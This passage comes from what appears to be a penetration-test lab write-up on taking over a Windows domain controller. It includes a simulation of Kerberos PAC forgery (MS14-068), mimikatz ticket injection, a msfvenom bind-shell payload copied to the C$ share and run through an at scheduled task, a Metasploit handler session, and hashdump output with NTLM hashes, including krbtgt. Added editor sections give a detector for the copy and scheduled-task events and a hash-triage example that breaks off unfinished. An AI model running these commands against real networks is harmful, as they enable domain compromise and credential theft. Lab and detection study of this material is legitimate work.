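    if ctype == HMAC_MD5:
        if not key:
            raise ValueError("HMAC_MD5 needs a key")
        return hmac.new(key, data, hashlib.md5).digest()
    raise ValueError(f"unsupported checksum type {ctype}")


def sign_pac_unkeyed(pac: Dict[str, object]) -> Tuple[int, bytes]:
    """What the exploit does: a 'signature' computable without any key."""
    return RSA_MD5, pac_checksum(RSA_MD5, pac_bytes(pac))


def kdc_verify_vulnerable(pac: Dict[str, object], ctype: int, sig: bytes) -> bool:
    """Pre-KB3011780 KDC: honours whatever checksum type the PAC signature
    names, so an unkeyed MD5 passes as a valid KDC signature."""
    key = KDC_KEY if ctype == HMAC_MD5 else b""
    return hmac.compare_digest(pac_checksum(ctype, pac_bytes(pac), key), sig)


def kdc_verify_fixed(pac: Dict[str, object], ctype: int, sig: bytes) -> bool:
    """Patched KDC: only a keyed checksum type is acceptable, so the
    attacker, who lacks the krbtgt key, cannot produce a valid signature."""
    if ctype != HMAC_MD5:
        return False
    return hmac.compare_digest(pac_checksum(ctype, pac_bytes(pac), KDC_KEY), sig)


if __name__ == "__main__":
    sid = "S-1-5-21-2005268815-658469957-1189185684-1103"   # SID from the page
    pac = forge_pac(sid)
    ctype, sig = sign_pac_unkeyed(pac)
    print("vulnerable KDC accepts forged PAC:", kdc_verify_vulnerable(pac, ctype, sig))
    print("patched KDC accepts forged PAC:   ", kdc_verify_fixed(pac, ctype, sig))
    print("groups asserted:", forged_group_sids(sid))
```

<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">This is why only a valid low-privilege password is needed: the password gets the attacker a legitimate TGT exchange with the KDC, and the unkeyed checksum lets the attacker vouch for the PAC contents themselves. Against a patched DC the same request is simply rejected.</span><span lang="EN-US"></span>
</p>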
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.1.13.2. </span><span style="font-family:黑体;font-weight:normal;">Load </span><span lang="EN-US">kiwi</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.5pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">load kiwi</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.1.13.3. </span><span style="font-family:黑体;font-weight:normal;">Purge existing tickets</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:24.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">kerberos_ticket_purge </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">removes every Kerberos ticket from the current logon session, so that the forged ticket injected next is the only one Windows can use for the DC.</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.1.13.4. </span><span style="font-family:黑体;font-weight:normal;">导入票据</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">在 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">metasploit mimikatz </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">好似没有这个功能。</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Upload </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">mimikatz </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">and inject the ticket</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">mimikatz # kerberos::ptc </span><u style="text-underline:blue;"><span lang="EN-US" style="color:blue;font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">[email protected]</span></u><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="261" src="https://www.2k8.org/content/uploadfile/202203/17/774ce8bd.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">exit</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">klist </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">shows the current tickets</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:4.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="225" src="https://www.2k8.org/content/uploadfile/202203/17/5bc1f4ca.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Access the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">domain controller</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:57.05pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="219" src="https://www.2k8.org/content/uploadfile/202203/17/c9944886.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:22.2pt;margin-left:-.25pt;">
<a name="_Toc21074"></a><span lang="EN-US">5.1.14. </span><span><span style="font-family:宋体;font-weight:normal;">Obtain </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">domain controller privileges</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:18.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.1.14.1. </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:110%;">Generate a bind payload</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.2pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe >`pwd`/bind.exe</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.1.14.2. copy </span><span style="font-family:黑体;font-weight:normal;">to the domain controller</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:87.25pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com>copy bind.exe \\dc\C$\<br />1 file(s) copied.</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.1.14.3. at </span><span style="font-family:黑体;font-weight:normal;">schedule a task to run the </span><span lang="EN-US">exe</span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:175.3pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com>at</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">There are no entries in the list.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:153.65pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com>at \\dc</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">There are no entries in the list.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:117.85pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com>net time \\dc</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:230%;margin-bottom:15.6pt;margin-left:-.25pt;margin-right:206.35pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:230%;">Current time at \\dc is 2020/6/21 23:53:07<br />The command completed successfully.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:59.15pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com>at \\dc 23:55:00 c:/bind.exe</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:38.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Added a new job with job ID = 1</span><span lang="EN-US"></span>
</p>
<h6 style="margin-top:0cm;margin-right:0cm;margin-bottom:17.6pt;margin-left:-.25pt;">
<span lang="EN-US">5.1.14.4. </span><span style="font-family:黑体;font-weight:normal;">Commands used to obtain domain controller privileges</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Copy the file to the target</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:118%;margin-bottom:1.05pt;margin-left:-.25pt;margin-right:310.9pt;margin-top:0cm;text-align:justify;text-indent:-.5pt;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">copy bind.exe \\dc\C$\</span><br /><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">Query the time on </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">dc</span><br /><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">net time \\dc</span><br /><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">Add a scheduled task to run it</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">at \\dc 23:55:00 c:/bind.exe</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Connect to the domain controller</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:79.15pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">use exploit/multi/handler<br />msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp<br />payload => windows/meterpreter/bind_tcp<br />msf5 exploit(multi/handler) > set rhost 10.10.10.149<br />rhost => 10.10.10.149<br />msf5 exploit(multi/handler) > set lport 13777<br />lport => 13777<br />msf5 exploit(multi/handler) > exploit</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:28.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="377" src="https://www.2k8.org/content/uploadfile/202203/17/a66e91e5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
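<p>Defensive view of the copy/at sequence in this section, added here as an editor's example and not taken from the original write-up: on the domain controller, the copy to \\dc\C$ and the at job show up as Security events 5140 (a network share object was accessed) and 4698 (a scheduled task was created). The Python below correlates the two over constructed, simplified event records. The event field names follow the Windows Security schema; the ten-minute window, the host and account names and all sample values are assumptions of the example.</p>

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified Windows Security events (not from the page). The keys mirror the
# 5140 "network share object was accessed" and 4698 "scheduled task was created" fields
# (SubjectUserName, IpAddress, ShareName, TaskName, TaskContent) flattened into dicts.
EVENTS = [
    {"id": 5140, "time": "2020-06-21T23:50:03", "host": "DC", "user": "HACKBOX\\web",
     "ip": "10.10.10.80", "share": "\\\\*\\C$"},
    {"id": 5140, "time": "2020-06-21T23:51:10", "host": "DC", "user": "HACKBOX\\svc_backup",
     "ip": "10.10.10.50", "share": "\\\\*\\Backups"},
    {"id": 4698, "time": "2020-06-21T23:52:00", "host": "DC", "user": "HACKBOX\\svc_backup",
     "ip": "10.10.10.50", "task": "\\Microsoft\\Windows\\Backup\\Nightly",
     "task_content": "<Exec><Command>C:\\Program Files\\Backup\\run.exe</Command></Exec>"},
    {"id": 4698, "time": "2020-06-21T23:53:20", "host": "DC", "user": "HACKBOX\\web",
     "ip": "10.10.10.80", "task": "\\At1",
     "task_content": "<Exec><Command>c:/bind.exe</Command></Exec>"},
]

ADMIN_SHARES = {"C$", "ADMIN$", "D$"}                 # hidden administrative shares
LOOKBACK = timedelta(minutes=10)                       # correlation window (tuning assumption)
AT_TASK = re.compile(r"^\\At\d+$")                     # at.exe names its jobs \At1, \At2, ...
COMMAND = re.compile(r"<Command>(.*?)</Command>", re.S)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:[\\/][^\\/]+$")    # e.g. c:/bind.exe: a binary dropped at a drive root


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _share_name(unc):
    # "\\*\C$" -> "C$"
    return unc.rsplit("\\", 1)[-1].upper()


def detect_remote_task_after_admin_share(events, lookback=LOOKBACK):
    """One finding per 4698 that looks like remote execution staged through an admin share."""
    events = sorted(events, key=_ts)
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] != 4698:
            continue
        reasons = []
        # 1. the same account touched an administrative share on this host shortly before
        for prior in events[:i]:
            if (prior["id"] == 5140 and prior["host"] == ev["host"]
                    and prior["user"] == ev["user"]
                    and _share_name(prior["share"]) in ADMIN_SHARES
                    and _ts(ev) - _ts(prior) <= lookback):
                secs = int((_ts(ev) - _ts(prior)).total_seconds())
                reasons.append("admin share %s accessed %ds earlier from %s"
                               % (_share_name(prior["share"]), secs, prior["ip"]))
        # 2. legacy at.exe job naming
        if AT_TASK.match(ev["task"]):
            reasons.append("at.exe-style task name %s" % ev["task"])
        # 3. the task launches a binary sitting at the root of a drive
        m = COMMAND.search(ev.get("task_content", ""))
        if m and DRIVE_ROOT.match(m.group(1).strip()):
            reasons.append("task runs a binary from a drive root: %s" % m.group(1).strip())
        if reasons:
            findings.append({"time": ev["time"], "host": ev["host"], "user": ev["user"],
                             "source_ip": ev["ip"], "task": ev["task"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_remote_task_after_admin_share(EVENTS):
        print(f["time"], f["host"], f["user"], f["task"])
        for r in f["reasons"]:
            print("   -", r)
```

<p>Both events are only written when the corresponding audit policies are on: 5140 needs "Audit File Share" and 4698 needs "Audit Other Object Access Events" under Object Access. The backup task in the sample produces no finding because none of the three signals applies to it; the web account's task trips all three.</p>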
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:11.45pt;margin-left:-.25pt;">
<a name="_Toc21075"></a><span lang="EN-US">5.1.15. </span><span><span style="font-family:宋体;font-weight:normal;">Obtain hashes and plaintext from the </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">domain controller</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Migrate the process</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:281.6pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">migrate 388<br />meterpreter > run hashdump</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:60.65pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]<br />[*] Obtaining the boot key...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Calculating the hboot key using SYSKEY 36ce7093f2a02644f802d363ec425289...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:229.6pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated<br />[*] Obtaining the user list and keys...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Decrypting user keys...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:268: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:272: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:279: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.25pt;margin-left:-.25pt;margin-right:229.6pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated<br />[*] Dumping password hints...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">No users with password hints on this system</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Dumping password hashes...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Administrator:500:aad3b435b51404eeaad3b435b51404ee:2cbe963d0d877c8cc7d09c936f1c3b33:::</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:326.55pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">load mimikatz<br />tspkg</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:39.15pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="143" src="https://www.2k8.org/content/uploadfile/202203/17/577ca08e.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21076"></a><span lang="EN-US">5.1.16. </span><span><span style="font-family:宋体;font-weight:normal;">Dump every domain controller </span><span lang="EN-US">hash</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/gather/smart_hashdump</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:28.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="167" src="https://www.2k8.org/content/uploadfile/202203/17/709c2b03.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:2cbe963d0d877c8cc7d09c936f1c3b33</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 208.65pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span> </span>krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6f60ace6accbcb76078ccc0312174e98</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 209.65pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span> </span>web:1103:aad3b435b51404eeaad3b435b51404ee:086a0bb1ed4ec72250760ea531bf8074</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 201.95pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span> </span>DC$:1000:aad3b435b51404eeaad3b435b51404ee:35038905f0fcf79eca3d8fff28f94f87</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:88.0pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 193.2pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span> </span>WEB$:1104:aad3b435b51404eeaad3b435b51404ee:fd0c8f5bc45e86c9ca5c8a289</span><span lang="EN-US"></span>
</p>
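<p>The listing above is why a hash dump from a domain controller is handled as a domain-wide compromise during incident response. As an added example (not part of the original, and using constructed values rather than the page's), the Python below triages pwdump-format lines of this shape: it recognises the empty LM hash (LM storage disabled) and the empty-password NT hash, flags krbtgt, whose exposure allows forged TGTs until the account has been reset twice, separates machine accounts from accounts that need a manual reset, and tolerates a truncated line like the WEB$ entry above instead of crashing on it.</p>

```python
import re

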